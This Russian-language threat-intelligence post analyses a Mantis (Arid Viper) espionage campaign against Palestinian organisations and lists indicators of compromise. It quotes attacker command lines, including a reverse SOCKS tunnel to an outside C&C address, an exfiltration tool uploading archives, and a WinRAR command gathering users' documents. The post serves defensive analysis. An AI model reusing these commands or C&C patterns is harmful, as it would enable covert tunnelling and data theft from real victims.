AridViper (APT-C-23) APT IOCs

security IOC

Группа кибершпионажа Mantis (она же Arid Viper, Desert Falcon, APT-C-23), действующая, как предполагается, с палестинских территорий, продолжает проводить атаки, развертывая обновленный набор инструментов и прилагая все усилия для поддержания постоянного присутствия в атакуемых сетях.

Хотя эта группа известна своими атаками на организации на Ближнем Востоке, последняя обнаруженная Symantec кампания Broadcom Software была направлена на организации на палестинских территориях, причем вредоносная активность началась в сентябре 2022 года и продолжалась по меньшей мере до февраля 2023 года. Подобные атаки не являются беспрецедентными для Mantis, и Symantec ранее обнаружила атаки на частных лиц, находящихся на палестинских территориях, в течение 2017 года.

Mantis APT

Mantis действует по меньшей мере с 2014 года, а по некоторым данным, полученным от третьих лиц, она могла действовать еще в 2011 году. Известно, что целью группы были организации в Израиле и ряде других стран Ближнего Востока. В число объектов нападения входят правительственные, военные, финансовые, медийные, образовательные, энергетические и аналитические центры. Группа известна тем, что использует фишинговые электронные письма и поддельные профили в социальных сетях для того, чтобы заманить жертв и заставить их установить вредоносное ПО на свои устройства.

По общему мнению, Mantis связана с палестинскими территориями. Хотя другие производители связывают эту группу с ХАМАС, Symantec не может однозначно отнести ее к какой-либо палестинской организации.

В своих последних атаках группа использовала обновленные версии своих собственных бэкдоров Micropsia и Arid Gopher для компрометации целей, а затем приступила к масштабной краже учетных данных и утечке похищенных данных.

Первоначальный вектор заражения в этой кампании остается неизвестным. В одной из организаций, ставшей объектом атаки, особенностью компрометации было то, что злоумышленники развернули три различные версии одного и того же набора инструментов (т.е. разные варианты одних и тех же инструментов) на трех группах компьютеров. Подобное разделение атаки, вероятно, было мерой предосторожности. Если бы один набор инструментов был обнаружен, злоумышленники все равно имели бы постоянное присутствие в сети объекта атаки.

Ниже приводится описание того, как использовался один из этих трех наборов инструментов:

Первые признаки вредоносной активности появились 18 декабря 2022 года. Три разных набора обфусцированных команд PowerShell были выполнены для загрузки Base64-кодированной строки, которая запускала встроенный шеллкод. Шеллкод представлял собой 32-битный стейджер, который загружал другой стейдж с помощью базового протокола на основе TCP с командно-контрольного (C&C) сервера: 104.194.222[.]50 порт 4444.

Злоумышленники вернулись 19 декабря, чтобы сбросить учетные данные перед загрузкой бэкдора Micropsia и Putty, общедоступного клиента SSH, используя Certutil и BITSAdmin.

Впоследствии Micropsia была запущена и инициировала контакт с сервером C&C. В тот же день Micropsia также была запущена на трех других машинах в той же организации. В каждом случае он запускался в папке, названной по имени файла:

  • csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
  • csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
  • csidl_common_appdata\windowsps\windowsps.exe

На одном компьютере Micropsia использовалась для настройки обратного socks-туннеля к внешнему IP-адресу:

  • CSIDL_COMMON_APPDATA\windowsservicemanageav\windowsservicemanageav.exe -connect 104.194.222[.]50:443 [REDACTED].

20 декабря Micropsia была использована для запуска неизвестного исполняемого файла с именем windowspackages.exe на одном из зараженных компьютеров.

На следующий день, 21 декабря, был запущен RAR для архивирования файлов на другом зараженном компьютере.

В период с 22 декабря по 2 января 2023 года Micropsia использовалась для выполнения бэкдора Arid Gopher на трех зараженных компьютерах. Arid Gopher, в свою очередь, использовался для запуска инструмента SetRegRunKey.exe, который обеспечивал постоянство, добавляя Arid Gopher в реестр, чтобы он запускался при перезагрузке. Он также запускал неизвестный файл под названием localsecuritypolicy.exe (это имя файла использовалось злоумышленниками для бэкдора Arid Gopher в другом месте).

28 декабря Micropsia использовалась для запуска windowspackages.exe еще на трех зараженных компьютерах.

31 декабря Arid Gopher выполнил два неизвестных файла с именами networkswitcherdatamodell.exe и networkuefidiagsbootserver.exe на двух зараженных компьютерах.

2 января злоумышленники отменили версию Arid Gopher, которую они использовали, и представили новый вариант. Было ли это связано с тем, что первая версия была обнаружена, или это была стандартная операционная процедура, неизвестно.

4 января Micropsia была использована для выполнения двух неизвестных файлов, оба с именем hostupbroker.exe, на одном компьютере из папки: csidl_common_appdata\hostupbroker\hostupbroker.exe. За этим сразу же последовала эксфильтрация RAR-файла:

  • CSIDL_COMMON_APPDATA\windowsupserv\windowsupserv.exe -f CSIDL_COMMON_APPDATA\windowspackages\01-04-2023-15-13-39_getf.rar

9 января Arid Gopher был использован для выполнения двух неизвестных файлов на одном компьютере:

  • csidl_common_appdata\teamviewrremoteservice\teamviewrremoteservice.exe
  • csidl_common_appdata\embededmodeservice\embededmodeservice.exe

Последняя вредоносная активность наблюдалась с 12 января, когда Arid Gopher использовался для выполнения неизвестного файла localsecuritypolicy.exe каждые десять часов.

Micropsia

Варианты бэкдора Micropsia, использованные в этих атаках, похоже, являются слегка обновленными версиями тех, которые были замечены другими производителями. В этой кампании Micropsia была развернута с использованием нескольких имен файлов и путей к ним:

  • csidl_common_appdata\microsoft\dotnet35\microsoftdotnet35.exe
  • csidl_common_appdata\microsoftservicesusermanual\systempropertiesinternationaltime.exe
  • csidl_common_appdata\systempropertiesinternationaltime\systempropertiesinternationaltime.exe
  • csidl_common_appdata\windowsnetworkmanager\windowsnetworkmanager.exe
  • csidl_common_appdata\windowsps\windowsps.exe

Micropsia выполняется с помощью WMI, и ее основной целью является запуск вторичных полезных нагрузок для злоумышленников. К ним относятся:

  • Arid Gopher (имена файлов: networkvirtualizationstartservice.exe, networkvirtualizationfiaservice.exe, networkvirtualizationseoservice.exe)
  • Reverse SOCKs Tunneler (он же Revsocks) (имя файла: windowsservicemanageav.exe)
  • Инструмент эксфильтрации данных (имя файла: windowsupserv.exe)
  • Два неизвестных файла, оба с именем hostupbroker.exe
  • Неизвестный файл с именем windowspackages.exe

В дополнение к этому Micropsia имеет свои собственные функции, такие как создание скриншотов, кейлоггинг и архивирование определенных типов файлов с помощью WinRAR для подготовки к эксфильтрации данных:

  • "%PROGRAMDATA%\Software Distributions\WinRAR\Rar. exe" a -r -ep1 -v2500k -hp71012f4c6bdeeb73ae2e2196aa00bf59_d01247a1eaf1c24ffbc851e883e67f9b -ta2023-01-14
  • "%PROGRAMDATA%\Software Distributions\Bdl\LMth__C_2023-02-13 17-14-41" "%USERPROFILE%\*. xls" "%USERPROFILE%\*.xlsx" "%USERPROFILE%\*. doc"
  • "%USERPROFILE%\*.docx" "%USERPROFILE%\*.csv" "%USERPROFILE%\*.pdf" "%USERPROFILE%\*.ppt" "%USERPROFILE%\*.pptx" "%USERPROFILE%\*. odt"
  • "%USERPROFILE%\*.mdb" "%USERPROFILE%\*.accdb" "%USERPROFILE%\*.accde" "%USERPROFILE%\*.txt" "%USERPROFILE%\*.rtf" "%USERPROFILE%\*.vcf"

Arid Gopher

В отличие от Micropsia, которая написана на Delphi, Arid Gopher написан на Go. Версии Arid Gopher, использованные в этой кампании, содержат следующие встроенные компоненты:

  • 7za.exe - копия легитимного исполняемого файла 7-Zip.
  • AttestationWmiProvider.exe - инструмент, устанавливающий значение реестра "run".
  • ServiceHubIdentityHost.exe - Копия легитимного исполняемого файла Shortcut.exe от Optimum X
  • Setup.env - Конфигурационный файл

Arid Gopher также использовался для запуска следующих неизвестных файлов: networkswitcherdatamodell.exe, localsecuritypolicy.exe и networkuefidiagsbootserver.exe, а также для загрузки и выполнения файлов, обфусцированных с помощью PyArmor.

При общении с C&C-сервером Arid Gopher регистрирует устройство на одном пути, затем подключается к другому пути, вероятно, для получения команд:

Подключается к: http://jumpstartmail[.]com/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 79.133.51[.]134) - вероятно, регистрирует устройство.
За ним следует: http://jumpstartmail[.]com/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно, получает команды.
Подключается к: http://salimafia[.]net/IURTIER3BNV4ER/DWL1RucGSj/4wwA7S8jQv (IP: 146.19.233[.]32) - вероятно, регистрирует устройство
За ним следует: http://salimafia[.]net/IURTIER3BNV4ER/AJLUK9BI48/0L6W3CSBMC - вероятно получение команд.

Arid Gopher регулярно обновляется и переписывается злоумышленниками, скорее всего, для того, чтобы избежать обнаружения. Один из вариантов вредоносной программы радикально отличался от предыдущих версий, в которых была обновлена большая часть отличительного кода, настолько, что не было ни одной подпрограммы, содержащей идентичный отличительный код по сравнению с предыдущей версией. Судя по всему, Mantis агрессивно мутировал логику между вариантами, что является трудоемкой операцией, если ее выполнять вручную.

Инструмент эксфильтрации

Для эксфильтрации данных, похищенных у целевых организаций, злоумышленники также использовали специальный инструмент: 64-битный исполняемый файл PyInstaller под названием WindowsUpServ.exe. При запуске инструмент проверяет наличие следующих аргументов командной строки:

  • "-d" "[FILE_DIRECTORY]"
  • "-f" "[FILENAME]".

Для каждого аргумента командной строки "-f" "[FILENAME]" инструмент загружает содержимое [FILENAME]. Для каждого аргумента командной строки "-d" "[FILE_DIRECTORY]" инструмент получает список файлов, хранящихся в папке [FILE_DIRECTORY], и загружает содержимое каждого файла.

При загрузке каждого файла инструмент отправляет HTTP POST-запрос на C&C-сервер со следующими параметрами:

  • "kjdfnqweb": [THE_FILE_CONTENT].
  • "qyiwekqq": [HOSTNAME_OF_THE_AFFECTED_COMPUTER].

Когда удаленный сервер отвечает кодом состояния 200, вредоносная программа удаляет загруженный файл с локального диска. Вредоносная программа также может записывать некоторые свои действия в следующие файлы:

  • "C:\ProgramData\WindowsUpServ\success.txt"
  • "C:\ProgramData\WindowsUpServ\err.txt"

Indicators of Compromise

Domains

  • chloe-boreman.com
  • criston-cole.com
  • jumpstartmail.com
  • paydayloansnew.com
  • picture-world.info
  • rnacgroup.com
  • salimafia.net
  • seomoi.net
  • soft-utils.com

URLs

  • http://5.182.39.44/esuzmwmrtajj/cmsnvbyawttf/mkxnhqwdywbu

SHA256

  • 0a6247759679c92e1d2d2907ce374e4d6112a79fe764a6254baff4d14ac55038
  • 0fb4d09a29b9ca50bc98cb1f0d23bfc21cb1ab602050ce786c86bd2bb6050311
  • 11b81288e5ed3541498a4f0fd20424ed1d9bd1e4fae5e6b8988df364e8c02c4e
  • 1b62730d836ba612c3f56fa8c3b0b5a282379869d34e841f4dca411dce465ff6
  • 1d1a0f39f339d1ddd506a3c5a69a9bc1e411e057fe9115352482a20b63f609aa
  • 211f04160aa40c11637782973859f44fd623cb5e9f9c83df704cc21c4e18857d
  • 21708cea44e38d0ef3c608b25933349d54c35e392f7c668c28f3cf253f6f9db8
  • 220eba0feb946272023c384c8609e9242e5692923f85f348b05d0ec354e7ac3c
  • 3d649b84df687da1429c2214d6f271cc9c026eb4a248254b9bfd438f4973e529
  • 411086a626151dc511ab799106cfa95b1104f4010fe7aec50b9ca81d6a64d299
  • 4840214a7c4089c18b655bd8a19d38252af21d7dd048591f0af12954232b267f
  • 4a25ca8c827e6d84079d61bd6eba563136837a0e9774fd73610f60b67dca6c02
  • 5405ff84473abccc5526310903fcc4f7ad79a03af9f509b6bca61f1db8793ee4
  • 58331695280fc94b3e7d31a52c6a567a4508dc7be6bdc200f23f5f1c72a3f724
  • 5af853164cc444f380a083ed528404495f30d2336ebe0f2d58970449688db39e
  • 5ea6bdae7b867b994511d9c648090068a6f50cb768f90e62f79cd8745f53874d
  • 624705483de465ff358ffed8939231e402b0f024794cf3ded9c9fc771b7d3689
  • 6a0686323df1969e947c6537bb404074360f27b56901fa2bac97ae62c399e061
  • 7ae97402ec6d973f6fb0743b47a24254aaa94978806d968455d919ee979c6bb4
  • 82f734f2b1ccc44a93b8f787f5c9b4eca09efd9e8dcd90c80ab355a496208fe4
  • 85b083b431c6dab2dd4d6484fe0749ab4acba50842591292fdb40e14ce19d097
  • 8d1c7d1de4cb42aa5dee3c98c3ac637aebfb0d6220d406145e6dc459a4c741b2
  • b6a71ca21bb5f400ff3346aa5c42ad2faea4ab3f067a4111fd9085d8472c53e3
  • bb6fd3f9401ef3d0cc5195c7114764c20a6356c63790b0ced2baceb8b0bdac51
  • bc9a4df856a8abde9e06c5d65d3bf34a4fba7b9907e32fb1c04d419cca4b4ff9
  • c4b9ad35b92408fa85b92b110fe355b3b996782ceaafce7feca44977c037556b
  • cb765467dd9948aa0bfff18214ddec9e993a141a5fdd8750b451fd5b37b16341
  • d10a2dda29dbf669a32e4198657216698f3e0e3832411e53bd59f067298a9798
  • d420b123859f5d902cb51cce992083370bbd9deca8fa106322af1547d94ce842
  • f2168eca27fbee69f0c683d07c2c5051c8f3214f8841c05d48897a1a9e2b31f8
  • f38ad4aa79b1b448c4b70e65aecc58d3f3c7eea54feb46bdb5d10fb92d880203
  • f98bc2ccac647b93f7f7654738ce52c13ab477bf0fa981a5bf5b712b97482dfb
Avatar for Gnostis
Gnostis
SEC-1275-1
Добавить комментарий